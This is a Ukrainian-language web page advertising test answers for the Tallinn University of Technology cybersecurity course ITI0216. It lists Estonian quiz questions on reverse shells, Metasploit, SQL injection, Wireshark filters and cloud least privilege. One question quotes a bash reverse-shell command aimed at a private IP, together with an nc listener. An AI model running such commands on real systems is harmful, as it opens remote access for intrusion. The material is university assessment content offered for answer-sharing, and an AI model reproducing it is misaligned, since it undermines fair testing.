Шукаєте відповіді та рішення тестів для ITI0216 Küberturbe alused (2025 kevad)? Перегляньте нашу велику колекцію перевірених відповідей для ITI0216 Küberturbe alused (2025 kevad) в moodle.taltech.ee.
Отримайте миттєвий доступ до точних відповідей та детальних пояснень для питань вашого курсу. Наша платформа, створена спільнотою, допомагає студентам досягати успіху!
Milline süsteem aitab rakendada minimaalõiguste printsiipi (principle of least privilege) pilves?
Mida teeb Metasploit käsk "search FTP"?
Ründaja arvuti IP on 192.168.1.2 ja rünnatava (ohver) arvuti IP on 192.168.1.4
Ründaja käivitab edukalt enda arvutis (Kali) käsu "bash -i >& /dev/tcp/192.168.1.2/8000 0>&1" ja ohvri arvutis (Ubuntu) õnnestub edukalt käivitada käsk "nc -lnvp 8000".
Mida proovib ründaja saavutada ja kas see on tõenäoliselt edukas?
Mida aitab teha reverse shell (ehk vastukest)?
Mis liiki haavatavust/rünnet testitakse (kõige tõenäolisemalt) sellise koodi abil?
E-poe administraator avastas oma veebiserveri logidest päringud aadressile
Aadressi algus on E-poe ametlik kodulehe aadress, aga lõpp tundus veider.
Millest võiks selline päring olla tingitud?
^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$Millega on tegemist?
Mis tööriista kasutatakse tavaliselt Elastic süsteemis (Elastic Stack) andmete visualiseerimiseks?
Kas põhimõtteliselt on võimalik, et SQL süsti (SQL injection attack) abil on võimalik ära muuta mõne kasutaja parool?
Milline mõju on järgmisel Wireshark filtril?
not (ip.addr == 1.1.1.1 and udp.port == 53)